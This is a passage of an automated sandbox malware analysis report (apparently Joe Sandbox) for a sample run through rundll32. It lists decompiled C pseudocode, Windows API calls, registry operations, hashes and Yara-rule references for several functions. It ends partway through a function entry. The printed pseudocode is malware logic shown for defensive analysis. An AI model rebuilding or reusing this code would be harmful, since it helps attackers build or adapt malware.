                                          • Opcode Fuzzy Hash: ecbd9157d61333f4c34e0244b65c6bbd78695ac24676c29b3dde04b812b975e3
                                          • Instruction Fuzzy Hash: B0319272A00A59BFEF159B98DC44E9E37FDEB44B04F1C0A55A600FB120E7B1BE44AB10
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B56B6A Relevance: 4.6, APIs: 3, Instructions: 81registryCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00B6BAC0: RegCreateKeyA.ADVAPI32(80000001,0614B7F0,?), ref: 00B6BAD5
                                            • Part of subcall function 00B6BAC0: lstrlen.KERNEL32(0614B7F0,00000000,00000000,00B7806E,?,?,?,00B56B9D,00000001,00000000,?), ref: 00B6BAFE
                                          • RegQueryValueExA.KERNEL32(00000000,?,00000000,?,00B78068,00000000,00000001,00000000,?,00B7806E,00000000,?,?,?,?,00000000), ref: 00B56BBE
                                          • RegSetValueExA.KERNEL32(00B78068,00000003,00000000,00000003,00B78068,00000028), ref: 00B56BFF
                                          • RegCloseKey.ADVAPI32(?), ref: 00B56C0B
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Value$CloseCreateQuerylstrlen
                                          • String ID:
                                          • API String ID: 2552977122-0
                                          • Opcode ID: ec2b3e2e176d976439983f0fb990b74aa31cc68139950799925785df99e5404e
                                          • Instruction ID: de16e9254c80e8fa96f625842d0597137069166d744df77f18165dc79d2de1d4
                                          • Opcode Fuzzy Hash: ec2b3e2e176d976439983f0fb990b74aa31cc68139950799925785df99e5404e
                                          • Instruction Fuzzy Hash: 92312D75D40218EFEB21DF95DC89AAEBBF8FB04751F5040A6E849A7250DB704E88CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0489250D Relevance: 4.6, APIs: 3, Instructions: 73memorystringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 79%
                                          			E0489250D(void* __eax, char* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16, void** _a20, intOrPtr* _a24) {
				char _v5;
				signed int _v12;
				intOrPtr _v16;
				char _t28;
				void* _t33;
				void* _t38;
				void* _t45;
				char* _t46;
				void* _t48;
				char* _t56;
				char* _t57;
				intOrPtr _t59;
				void* _t60;

				_t56 = _a4;
				_t60 = __eax;
				_v12 = 0xb;
				if(_t56 != 0 && __eax != 0) {
					_t5 = _t60 - 1; // -1
					_t46 =  &(_t56[_t5]);
					_t28 =  *_t46;
					_v5 = _t28;
					 *_t46 = 0;
					__imp__(_a8, _t45);
					_v16 = _t28;
					_t57 = StrStrA(_t56, _a8);
					if(_t57 != 0) {
						 *_t46 = _v5;
						_t33 = RtlAllocateHeap( *0x489a2d8, 0, _a16 + _t60); // executed
						_t48 = _t33;
						if(_t48 == 0) {
							_v12 = 8;
						} else {
							_t58 = _t57 - _a4;
							E0489799E(_t57 - _a4, _a4, _t48);
							_t38 = E0489799E(_a16, _a12, _t58 + _t48);
							_t53 = _v16;
							_t59 = _a16;
							E0489799E(_t60 - _t58 - _v16, _t53 + _t58 + _a4, _t38 + _t59);
							 *_a20 = _t48;
							_v12 = _v12 & 0x00000000;
							 *_a24 = _t60 - _v16 + _t59;
						}
					}
				}
				return _v12;
			}
















                                          0x04892515
                                          0x04892518
                                          0x0489251a
                                          0x04892523
                                          0x04892535
                                          0x04892535
                                          0x04892539
                                          0x0489253b
                                          0x0489253e
                                          0x04892541
                                          0x0489254a
                                          0x04892554
                                          0x04892558
                                          0x0489255d
                                          0x0489256d
                                          0x04892573
                                          0x04892577
                                          0x048925c6
                                          0x04892579
                                          0x04892579
                                          0x04892582
                                          0x04892591
                                          0x04892596
                                          0x048925a3
                                          0x048925ac
                                          0x048925b7
                                          0x048925be
                                          0x048925c2
                                          0x048925c2
                                          0x04892577
                                          0x048925cd
                                          0x048925d4

                                          APIs
                                          • lstrlen.KERNEL32(76DDF710,?,00000000,?,76DDF710), ref: 04892541
                                          • StrStrA.SHLWAPI(00000000,?), ref: 0489254E
                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 0489256D
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
                                          • Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: AllocateHeaplstrlen
                                          • String ID:
                                          • API String ID: 556738718-0
                                          • Opcode ID: c99346d9d96bc260da6668cad1a7bea3c39fbc5da53deb0db7f331f68edcf0a7
                                          • Instruction ID: 12f6d72fea18ba6c1d018d6900197f40ad4c20ffd823169ad78af365d379ab93
                                          • Opcode Fuzzy Hash: c99346d9d96bc260da6668cad1a7bea3c39fbc5da53deb0db7f331f68edcf0a7
                                          • Instruction Fuzzy Hash: F2217A36600609AFDF11DF68C884A9EBBB5EF84314F188A94EC44EB305D774ED15CBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B66278 Relevance: 4.6, APIs: 3, Instructions: 73registryCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00B69C23: lstrlen.KERNEL32(?,00000000,?,00000027,00B79208,?,00000000,?,?,?,?,?,00B5BDC2,?,00000001), ref: 00B69C59
                                            • Part of subcall function 00B69C23: lstrcpy.KERNEL32(00000000,00000000), ref: 00B69C7D
                                            • Part of subcall function 00B69C23: lstrcat.KERNEL32(00000000,00000000), ref: 00B69C85
                                          • RegOpenKeyExA.KERNEL32(00B6CC7F,00000000,00000000,00020119,80000001,00000000,?,00000000,?,00000000,?,00B6CC7F,80000001,?,00B66085), ref: 00B662BF
                                          • RegOpenKeyExA.ADVAPI32(00B6CC7F,00B6CC7F,00000000,00020019,80000001,?,00B6CC7F,80000001,?,00B66085), ref: 00B662D5
                                          • RegCloseKey.KERNEL32(80000001,80000001,?,00B66085,00B66095,?,00B6CC7F,80000001,?,00B66085), ref: 00B6631E
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Open$Closelstrcatlstrcpylstrlen
                                          • String ID:
                                          • API String ID: 4131162436-0
                                          • Opcode ID: 0a81cd893f8ae8a73b62b2bac8f1a48e1be6f2906bd5a3411ba592c51842cac1
                                          • Instruction ID: bea00a4a6191c777a17c82c6837bde685a223b47487f50c450206ea837e401e8
                                          • Opcode Fuzzy Hash: 0a81cd893f8ae8a73b62b2bac8f1a48e1be6f2906bd5a3411ba592c51842cac1
                                          • Instruction Fuzzy Hash: 9B214D7590020DBFDF00DF99DC85CAEBBFDEB08314B0000A5F904A7211D7759E559B60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04894117 Relevance: 4.6, APIs: 3, Instructions: 58COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 47%
                                          			E04894117(char* _a4, char** _a8) {
				char* _t7;
				char* _t11;
				char* _t14;
				char* _t16;
				char* _t17;
				char _t18;
				signed int _t20;
				signed int _t22;

				_t16 = _a4;
				_push(0x20);
				_t20 = 1;
				_push(_t16);
				while(1) {
					_t7 = StrChrA();
					if(_t7 == 0) {
						break;
					}
					_t20 = _t20 + 1;
					_push(0x20);
					_push( &(_t7[1]));
				}
				_t11 = E04894DF6(_t20 << 2);
				_a4 = _t11;
				if(_t11 != 0) {
					StrTrimA(_t16, 0x4899284); // executed
					_t22 = 0;
					do {
						_t14 = StrChrA(_t16, 0x20);
						if(_t14 != 0) {
							 *_t14 = 0;
							do {
								_t14 =  &(_t14[1]);
								_t18 =  *_t14;
							} while (_t18 == 0x20 || _t18 == 9);
						}
						_t17 = _a4;
						 *(_t17 + _t22 * 4) = _t16;
						_t22 = _t22 + 1;
						_t16 = _t14;
					} while (_t14 != 0);
					 *_a8 = _t17;
				}
				return 0;
			}











                                          0x0489411b
                                          0x04894128
                                          0x0489412a
                                          0x0489412b
                                          0x04894133
                                          0x04894133
                                          0x04894137
                                          0x00000000
                                          0x00000000
                                          0x0489412e
                                          0x0489412f
                                          0x04894132
                                          0x04894132
                                          0x0489413f
                                          0x04894144
                                          0x04894149
                                          0x04894151
                                          0x04894157
                                          0x04894159
                                          0x0489415c
                                          0x04894160
                                          0x04894162
                                          0x04894165
                                          0x04894165
                                          0x04894166
                                          0x04894168
                                          0x04894165
                                          0x04894172
                                          0x04894175
                                          0x04894178
                                          0x04894179
                                          0x0489417b
                                          0x04894182
                                          0x04894182
                                          0x0489418e

                                          APIs
                                          • StrChrA.SHLWAPI(?,00000020,00000000,052495AC,?,?,04896940,?,052495AC), ref: 04894133
                                          • StrTrimA.SHLWAPI(?,04899284,00000002,?,04896940,?,052495AC), ref: 04894151
                                          • StrChrA.SHLWAPI(?,00000020,?,04896940,?,052495AC), ref: 0489415C
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
                                          • Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: Trim
                                          • String ID:
                                          • API String ID: 3043112668-0
                                          • Opcode ID: 67153ee8221e8f2f8ac49fa3bb34e337d2aaeb4ad36b5eceb907cd3e509750c9
                                          • Instruction ID: 4bd139422ff29ed064d267e88973dd3292b3573c6bdcdb91c8ffb83bf9c72bf2
                                          • Opcode Fuzzy Hash: 67153ee8221e8f2f8ac49fa3bb34e337d2aaeb4ad36b5eceb907cd3e509750c9
                                          • Instruction Fuzzy Hash: 8401B171308B666FEB204E2A9C48F637ADDEBD5B44F0C0912B955CB242EA70EC03C660
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04893E6C Relevance: 4.5, APIs: 2, Strings: 1, Instructions: 48COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 64%
                                          			E04893E6C(intOrPtr __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void _v60;
				char _v64;
				long _t14;
				intOrPtr _t18;
				intOrPtr _t19;
				intOrPtr _t26;
				intOrPtr _t27;
				long _t28;

				_t27 = __edi;
				_t26 = _a8;
				_t14 = E04893C00(_a4, _t26, __edi); // executed
				_t28 = _t14;
				if(_t28 != 0) {
					memset( &_v60, 0, 0x38);
					_t18 =  *0x489a348; // 0x9ad5a8
					_t28 = 0;
					_v64 = 0x3c;
					if(_a12 == 0) {
						_t7 = _t18 + 0x489b4e8; // 0x70006f
						_t19 = _t7;
					} else {
						_t6 = _t18 + 0x489b8ec; // 0x750072
						_t19 = _t6;
					}
					_v52 = _t19;
					_push(_t28);
					_v48 = _a4;
					_v44 = _t26;
					_v36 = _t27;
					E048937E9();
					_push( &_v64);
					if( *0x489a100() == 0) {
						_t28 = GetLastError();
					}
					_push(1);
					E048937E9();
				}
				return _t28;
			}















                                          0x04893e6c
                                          0x04893e73
                                          0x04893e7c
                                          0x04893e81
                                          0x04893e85
                                          0x04893e8f
                                          0x04893e94
                                          0x04893e99
                                          0x04893e9e
                                          0x04893ea8
                                          0x04893eb2
                                          0x04893eb2
                                          0x04893eaa
                                          0x04893eaa
                                          0x04893eaa
                                          0x04893eaa
                                          0x04893eb8
                                          0x04893ebe
                                          0x04893ebf
                                          0x04893ec2
                                          0x04893ec5
                                          0x04893ec8
                                          0x04893ed0
                                          0x04893ed9
                                          0x04893ee1
                                          0x04893ee1
                                          0x04893ee3
                                          0x04893ee5
                                          0x04893ee5
                                          0x04893eef

                                          APIs
                                            • Part of subcall function 04893C00: SysAllocString.OLEAUT32(00000000), ref: 04893C5A
                                            • Part of subcall function 04893C00: SysAllocString.OLEAUT32(0070006F), ref: 04893C6E
                                            • Part of subcall function 04893C00: SysAllocString.OLEAUT32(00000000), ref: 04893C80
                                          • memset.NTDLL ref: 04893E8F
                                          • GetLastError.KERNEL32 ref: 04893EDB
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
                                          • Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: AllocString$ErrorLastmemset
                                          • String ID: <
                                          • API String ID: 3736384471-4251816714
                                          • Opcode ID: d33c46f633e4e62b11c2a092a5dc0b4fcdb9058888640926d74f7bafac62a266
                                          • Instruction ID: ca185f04f1155c57ef5531d0829820144f4de9925b14e38285c28a7e881b253c
                                          • Opcode Fuzzy Hash: d33c46f633e4e62b11c2a092a5dc0b4fcdb9058888640926d74f7bafac62a266
                                          • Instruction Fuzzy Hash: BC012171D00618BBDF11EF99D884EDE7BF8BB08744F084A25E905E7210E775AD448BA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B6BAC0 Relevance: 4.5, APIs: 3, Instructions: 40registrystringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RegCreateKeyA.ADVAPI32(80000001,0614B7F0,?), ref: 00B6BAD5
                                          • RegOpenKeyA.ADVAPI32(80000001,0614B7F0,?), ref: 00B6BADF
                                          • lstrlen.KERNEL32(0614B7F0,00000000,00000000,00B7806E,?,?,?,00B56B9D,00000001,00000000,?), ref: 00B6BAFE
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateOpenlstrlen
                                          • String ID:
                                          • API String ID: 2865187142-0
                                          • Opcode ID: 3062946f777d6f980a44351c43d1a1ecaaf4fc7a24f6158c1bed3c20c1b0c60b
                                          • Instruction ID: 9187854d0bc0b9928e84c96ea23513ec14d5362221c04c86dea424d1d5963afe
                                          • Opcode Fuzzy Hash: 3062946f777d6f980a44351c43d1a1ecaaf4fc7a24f6158c1bed3c20c1b0c60b
                                          • Instruction Fuzzy Hash: 51F06DB2100208BFE7119F90DC89FAB7BBCEB457A4F108045FD0AD6240DB759AC4C7A0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B63EC0 Relevance: 4.5, APIs: 3, Instructions: 18memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SetEvent.KERNEL32(0000039C,00B69D32), ref: 00B63ECA
                                            • Part of subcall function 00B544CE: SleepEx.KERNEL32(00000064,00000001,00000000,?,?,?,00B63ED5), ref: 00B544F7
                                            • Part of subcall function 00B544CE: RtlDeleteCriticalSection.NTDLL(00B79400), ref: 00B5452A
                                            • Part of subcall function 00B544CE: RtlDeleteCriticalSection.NTDLL(00B79420), ref: 00B54531
                                            • Part of subcall function 00B544CE: ReleaseMutex.KERNEL32(000005AC,00000000,?,?,?,00B63ED5), ref: 00B5455A
                                            • Part of subcall function 00B544CE: FindCloseChangeNotification.KERNEL32(?,?,00B63ED5), ref: 00B54566
                                            • Part of subcall function 00B544CE: ResetEvent.KERNEL32(00000000,00000000,?,?,?,00B63ED5), ref: 00B54572
                                            • Part of subcall function 00B544CE: CloseHandle.KERNEL32(?,?,00B63ED5), ref: 00B5457E
                                            • Part of subcall function 00B544CE: SleepEx.KERNEL32(00000064,00000001,00000000,?,?,?,00B63ED5), ref: 00B54584
                                            • Part of subcall function 00B544CE: SleepEx.KERNEL32(00000064,00000001,?,?,00B63ED5), ref: 00B54598
                                            • Part of subcall function 00B544CE: HeapFree.KERNEL32(00000000,00000000,?,?,00B63ED5), ref: 00B545BC
                                            • Part of subcall function 00B544CE: RtlRemoveVectoredExceptionHandler.NTDLL(02BB05B8), ref: 00B545F2
                                            • Part of subcall function 00B544CE: SleepEx.KERNEL32(00000064,00000001,?,?,00B63ED5), ref: 00B5460E
                                          • CloseHandle.KERNEL32(0000039C), ref: 00B63EDF
                                          • HeapDestroy.KERNELBASE(05D50000), ref: 00B63EEF
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Sleep$Close$CriticalDeleteEventHandleHeapSection$ChangeDestroyExceptionFindFreeHandlerMutexNotificationReleaseRemoveResetVectored
                                          • String ID:
                                          • API String ID: 3503058985-0
                                          • Opcode ID: c1d70f7f4afe819d241c7ec5504dc38435495f52c8d2d0f80b58eaecac5e1144
                                          • Instruction ID: 89b50decfbbf49a14efe1ee70b94db6644aef778b75a756024249411d6ff65ad
                                          • Opcode Fuzzy Hash: c1d70f7f4afe819d241c7ec5504dc38435495f52c8d2d0f80b58eaecac5e1144
                                          • Instruction Fuzzy Hash: 85E067707502029BDB109F75EC8DB5737E8BB05B423484494F90ED39A0EF2AD9C4DA30
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 048955D3 Relevance: 3.8, APIs: 3, Instructions: 82COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E048955D3(void* _a4, intOrPtr _a8, intOrPtr _a12) {
				int _v12;
				signed int _v16;
				void* _v20;
				signed char _v36;
				void* _t24;
				intOrPtr _t27;
				void* _t35;
				signed int _t38;
				signed char* _t46;
				int _t53;
				void* _t55;
				void* _t56;
				void* _t57;

				_v16 = _v16 & 0x00000000;
				_t46 = _a4;
				_t53 = ( *_t46 & 0x000000ff) + 0x110;
				_v12 = 0x110;
				_t24 = E04894DF6(_t53);
				_a4 = _t24;
				if(_t24 != 0) {
					memcpy(_t24,  *0x489a378, 0x110);
					_t27 =  *0x489a37c; // 0x0
					_t57 = _t56 + 0xc;
					if(_t27 != 0) {
						_t51 = _a4;
						E048929B5(0x110, _a4, _a4, _t27, 0);
					}
					if(E048966A9( &_v36) != 0) {
						_t35 = E04893072(0x110, 0,  &_v36, _a4,  &_v20,  &_v12); // executed
						if(_t35 == 0) {
							_t55 = _v20;
							_v36 =  *_t46;
							_t38 = E048917E5(_t55, _a8, _t51, _t46, _a12); // executed
							_v16 = _t38;
							 *(_t55 + 4) = _v36;
							_t20 =  &(_t46[4]); // 0xbf0845c7
							memset(_t55, 0, _v12 - ( *_t20 & 0xf));
							_t57 = _t57 + 0xc;
							E04894C73(_t55);
						}
					}
					memset(_a4, 0, _t53);
					E04894C73(_a4);
				}
				return _v16;
			}
















                                          0x048955d9
                                          0x048955de
                                          0x048955eb
                                          0x048955ee
                                          0x048955f1
                                          0x048955f6
                                          0x048955fb
                                          0x04895609
                                          0x0489560e
                                          0x04895613
                                          0x04895618
                                          0x0489561a
                                          0x04895623
                                          0x04895623
                                          0x04895632
                                          0x04895647
                                          0x0489564e
                                          0x04895655
                                          0x0489565b
                                          0x04895661
                                          0x04895669
                                          0x0489566f
                                          0x04895672
                                          0x0489567f
                                          0x04895684
                                          0x04895688
                                          0x04895688
                                          0x0489564e
                                          0x04895693
                                          0x0489569e
                                          0x0489569e
                                          0x048956aa

                                          APIs
                                            • Part of subcall function 04894DF6: RtlAllocateHeap.NTDLL(00000000,00000000,04895522), ref: 04894E02
                                          • memcpy.NTDLL(00000000,00000110,?,?,?,?,04896D90,?,048958B7,048958B7,?), ref: 04895609
                                          • memset.NTDLL ref: 0489567F
                                          • memset.NTDLL ref: 04895693
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
                                          • Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: memset$AllocateHeapmemcpy
                                          • String ID:
                                          • API String ID: 1529149438-0
                                          • Opcode ID: 707ae5f1604f9feea1d524e151f5d63dcfb5ef47bacf721fdd5a055a71e021a3
                                          • Instruction ID: 8d4bd69791e48a5043e4048219bb8aec326dbbcd8f2317e6b8e53efd11f515e0
                                          • Opcode Fuzzy Hash: 707ae5f1604f9feea1d524e151f5d63dcfb5ef47bacf721fdd5a055a71e021a3
                                          • Instruction Fuzzy Hash: 8E2121759009187FEF12AF69CC40FAE7BF8AF49644F084515F914E6250E774AE018BA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04891162 Relevance: 3.1, APIs: 2, Instructions: 149serviceCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 38%
                                          			E04891162(intOrPtr _a4) {
				void* _v12;
				char _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				char _v32;
				intOrPtr _v40;
				void* _v46;
				short _v48;
				intOrPtr _t49;
				void* _t51;
				intOrPtr* _t53;
				intOrPtr _t56;
				void* _t58;
				intOrPtr* _t59;
				intOrPtr* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				short _t73;
				intOrPtr* _t74;
				intOrPtr _t77;
				intOrPtr* _t80;
				intOrPtr _t82;
				char* _t98;
				intOrPtr _t100;
				void* _t106;
				void* _t108;
				intOrPtr _t112;

				_v48 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t49 =  *0x489a348; // 0x9ad5a8
				_t4 = _t49 + 0x489b450; // 0x52489f8
				_t82 = 0;
				_t5 = _t49 + 0x489b440; // 0x9ba05972
				_t51 =  *0x489a170(_t5, 0, 4, _t4,  &_v20); // executed
				_t106 = _t51;
				if(_t106 >= 0) {
					_t53 = _v20;
					_push( &_v12);
					_push(1);
					_push( &_v32);
					_push(8);
					_t98 =  &_v48;
					_push(_t98);
					_push(_t98);
					_push(_t53); // executed
					if( *((intOrPtr*)( *_t53 + 0x3c))() == 0) {
						_t56 =  *0x489a348; // 0x9ad5a8
						_t30 = _t56 + 0x489b430; // 0x52489d8
						_t31 = _t56 + 0x489b460; // 0x4c96be40
						_t58 =  *0x489a10c(_v12, _t31, _t30,  &_v24); // executed
						_t106 = _t58;
						_t59 = _v12;
						 *((intOrPtr*)( *_t59 + 8))(_t59);
						goto L11;
					} else {
						_t71 = _v20;
						_v16 = 0;
						_t106 =  *((intOrPtr*)( *_t71 + 0x1c))(_t71,  &_v16);
						if(_t106 >= 0) {
							_t112 = _v16;
							if(_t112 == 0) {
								_t106 = 0x80004005;
								goto L11;
							} else {
								if(_t112 <= 0) {
									L11:
									if(_t106 >= 0) {
										goto L12;
									}
								} else {
									do {
										_t73 = 3;
										_v48 = _t73;
										_t74 = _v20;
										_v40 = _t82;
										_t108 = _t108 - 0x10;
										asm("movsd");
										asm("movsd");
										asm("movsd");
										asm("movsd");
										_t106 =  *((intOrPtr*)( *_t74 + 0x20))(_t74,  &_v12);
										if(_t106 < 0) {
											goto L7;
										} else {
											_t77 =  *0x489a348; // 0x9ad5a8
											_t23 = _t77 + 0x489b430; // 0x52489d8
											_t24 = _t77 + 0x489b460; // 0x4c96be40
											_t106 =  *0x489a10c(_v12, _t24, _t23,  &_v24);
											_t80 = _v12;
											 *((intOrPtr*)( *_t80 + 8))(_t80);
											if(_t106 >= 0) {
												L12:
												_t63 = _v24;
												_t106 =  *((intOrPtr*)( *_t63 + 0x3c))(_t63,  &_v28);
												if(_t106 >= 0) {
													_t100 =  *0x489a348; // 0x9ad5a8
													_t67 = _v28;
													_t40 = _t100 + 0x489b420; // 0x214e3
													_t106 =  *((intOrPtr*)( *_t67))(_t67, _t40, _a4);
													_t69 = _v28;
													 *((intOrPtr*)( *_t69 + 8))(_t69);
												}
												_t65 = _v24;
												 *((intOrPtr*)( *_t65 + 8))(_t65);
											} else {
												goto L7;
											}
										}
										goto L15;
										L7:
										_t82 = _t82 + 1;
									} while (_t82 < _v16);
									goto L11;
								}
							}
						}
					}
					L15:
					_t61 = _v20;
					 *((intOrPtr*)( *_t61 + 8))(_t61);
				}
				return _t106;
			}


































                                          0x0489116d
                                          0x04891174
                                          0x04891175
                                          0x04891176
                                          0x04891177
                                          0x0489117d
                                          0x04891182
                                          0x0489118b
                                          0x0489118e
                                          0x04891195
                                          0x0489119b
                                          0x0489119f
                                          0x048911a5
                                          0x048911ad
                                          0x048911ae
                                          0x048911b3
                                          0x048911b4
                                          0x048911b6
                                          0x048911b9
                                          0x048911ba
                                          0x048911bb
                                          0x048911c1
                                          0x04891257
                                          0x0489125c
                                          0x04891263
                                          0x0489126d
                                          0x04891273
                                          0x04891275
                                          0x0489127b
                                          0x00000000
                                          0x048911c7
                                          0x048911c7
                                          0x048911ce
                                          0x048911d7
                                          0x048911db
                                          0x048911e1
                                          0x048911e4
                                          0x0489124c
                                          0x00000000
                                          0x048911e6
                                          0x048911e6
                                          0x0489127e
                                          0x04891280
                                          0x00000000
                                          0x00000000
                                          0x048911ec
                                          0x048911ec
                                          0x048911ee
                                          0x048911f3
                                          0x048911f7
                                          0x048911fa
                                          0x048911ff
                                          0x04891207
                                          0x04891208
                                          0x04891209
                                          0x0489120b
                                          0x0489120f
                                          0x04891213
                                          0x00000000
                                          0x04891215
                                          0x04891219
                                          0x0489121e
                                          0x04891225
                                          0x04891235
                                          0x04891237
                                          0x0489123d
                                          0x04891242
                                          0x04891282
                                          0x04891282
                                          0x0489128f
                                          0x04891293
                                          0x04891298
                                          0x0489129e
                                          0x048912a3
                                          0x048912ad
                                          0x048912af
                                          0x048912b5
                                          0x048912b5
                                          0x048912b8
                                          0x048912be
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x04891242
                                          0x00000000
                                          0x04891244
                                          0x04891244
                                          0x04891245
                                          0x00000000
                                          0x0489124a
                                          0x048911e6
                                          0x048911e4
                                          0x048911db
                                          0x048912c1
                                          0x048912c1
                                          0x048912c7
                                          0x048912c7
                                          0x048912d0

                                          APIs
                                          • IUnknown_QueryService.SHLWAPI(00000000,4C96BE40,052489D8,04893C2E,?,?,?,?,?,?,?,?,?,?,?,04893C2E), ref: 0489122F
                                          • IUnknown_QueryService.SHLWAPI(00000000,4C96BE40,052489D8,04893C2E,?,?,?,?,?,?,?,04893C2E,00000000,00000000,00000000,006D0063), ref: 0489126D
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
                                          • Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: QueryServiceUnknown_
                                          • String ID:
                                          • API String ID: 2042360610-0
                                          • Opcode ID: e5e621ab1bae4bf758b05d9581388b3d53051ae0893c0b94a318ad4707573fce
                                          • Instruction ID: cc434f5dfbd02df1e8ab06f249b1824d4575f8d2785fec32c8cb652a04b8dd8a
                                          • Opcode Fuzzy Hash: e5e621ab1bae4bf758b05d9581388b3d53051ae0893c0b94a318ad4707573fce
                                          • Instruction Fuzzy Hash: 17514575A00619AFDB04DFE8C888DAEB7F9FF48704B088A59E915EB250D770AD05CB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 048969D2 Relevance: 3.1, APIs: 2, Instructions: 112COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 75%
